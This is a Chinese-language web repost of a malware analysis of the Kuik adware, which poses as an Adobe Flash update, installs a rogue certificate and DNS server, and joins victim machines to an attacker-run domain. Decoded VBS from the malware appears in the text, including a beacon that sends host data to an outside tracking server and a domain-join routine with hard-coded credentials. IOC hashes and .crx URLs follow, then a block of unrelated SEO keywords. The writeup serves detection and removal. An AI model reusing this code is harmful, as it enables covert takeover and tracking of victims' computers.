千家信息网

如何理解Kuik

发表于:2024-11-28 作者:千家信息网编辑
千家信息网最后更新 2024年11月28日,今天就跟大家聊聊有关如何理解Kuik,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。最近我们的安全研究团队,就发现了这样一款名为Kuik的恶意广
千家信息网最后更新 2024年11月28日如何理解Kuik

今天就跟大家聊聊有关如何理解Kuik,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

最近我们的安全研究团队,就发现了这样一款名为Kuik的恶意广告软件。攻击者正试图利用这种独特的技术手法,将谷歌浏览器扩展程序和数字货币矿工应用推送给受害者。我们将对该恶意广告软件做进一步的技术分析,以及为大家提供相关的移除说明。

技术说明

Stage 1 - .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

第一阶段是使用.NET编写的伪造Adobe Flash Player图标的应用。这是典型的恶意捆绑,伪装成Adobe Flash Player更新程序欺骗用户安装。

我们使用dotNet反编译器(即dnSpy)打开后发现,该项目的原始名称为WWVaper。

它有三个内部资源:

证书(svr.crt)

一个合法的Flash(诱饵)

下一阶段组件(upp.exe)

证书:

-----BEGIN CERTIFICATE-----MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoMDEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMGA1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEWEHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbDoPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4yvHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah5HtIYSJZ2xwIcHqp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eXN6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5tZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgBhvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcNAQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVmAC+3h2huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ02zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=-----END CERTIFICATE-----

证书详情:

证书指向yahoo.com的一个DNS名称。但是,证书路径无效:

.NET installer负责安装恶意证书和其他组件。首先,它会枚举网络接口并将收集的IP添加到列表中:

然后,它将新的IP作为DNS(18.219.162.248)添加到收集的接口,并安装自己的证书(svr.crt):

Stage 2 - upp.exe

3a13b73f823f081bcdc57ea8cc3140ac

此应用是一个未被混淆过的installer bundle。在里面,我们找到了一个cabinet文件:

它包含要删除的其他模块:

应用程序"install.exe"以"setup.bat"作为参数进行部署。

Stage 3 - 从cabinet中解压缩组件

应用程序install.exe是基本的。它的唯一作用就是在提升模式( elevated mode)下运行下一个进程。在下面,你可以看到它的main function:

脚本setup.bat部署了另一个名为SqadU9FBEV.bat的组件:

它通过ping 127.0.0.1来延迟执行。然后,它会运行第二个被编码的脚本,并为其提供一个活动ID作为参数:

下一个元素被部署为一个编码的VBS脚本:

在解码后(解码器),我们可以清楚地看到该脚本的内容:NYkjVVXepl.vbs。我们还看到了系统指纹和到服务器的信标:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") for each System in SystemSet   winVer = System.Caption nextFunction trackEvent(eventName, extraData)  Set tracking = CreateObject("MSXML2.XMLHTTP")  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False  tracking.send  err.clearEnd Function

其中有一个非常有意思的片段,就是将受感染的计算机添加到域中:

SET objNetwork = CREATEOBJECT("WScript.Network")strComputer = objNetwork.ComputerNameSET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)If (ReturnValue  0) Or (err.number  0) Then  trackEvent "join-domain-failed", ReturnValue  WScript.Quit 1Else  trackEvent "join-domain-success", Null  WScript.Quit 0End IF

Payloads

该程序使用了一系列有效载荷,我们发现攻击者尤其偏爱假冒Chrome浏览器扩展程序。此外,还有一些数字货币矿工正在服务:

移除

Malwarebytes用户(版本为3.x)可以通过运行全面扫描从系统中移除此威胁,其中包括取消加入恶意域控制器,并将你的机器恢复到其原始状态。

IOCs

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crxd-and-h[.]com/123.crxd-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crxd-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crxkuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crxtripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B75133D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB7359685012687889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

看完上述内容,你们对如何理解Kuik有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。

证书 程序 恶意 应用 内容 组件 脚本 技术 运行 原始 参数 名称 就是 广告 应用程序 接口 攻击者 数字 浏览器 用户 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 湖南有哪些小众的软件开发公司 网络安全宣传月 总结 软件开发公司部门架构图 消防队网络安全工作台账 移动软件开发工程 桩基施工重大安全风险数据库 网络安全宣传共育栏照片 第一责任人网络安全工作相关批示 联想服务器代理服务 2018湖南网络安全宣传周 吉利科技投资互联网 坪山区网络技术价格走势 浅谈网络技术的特点 贝壳软件开发怎么样 软件开发识别法规清单 拍照翻译器软件开发 关于网络安全保护义务的意义 数据库时间 改变 游戏后台服务器一般都是什么型号 上海力谱云软件开发公司 凯软件开发类的资金来源 研祥服务器属于哪个公司 网络安全管理趋势论述 计算机网络技术对社会贡献 渝北区提供软件开发服务常见问题 渝北区网络安全宣传周知识竞答 qq改聊天数据库 久久为功培厚网络安全土壤 php数据库储存的文件名 彩6异种服务器连接没反应
0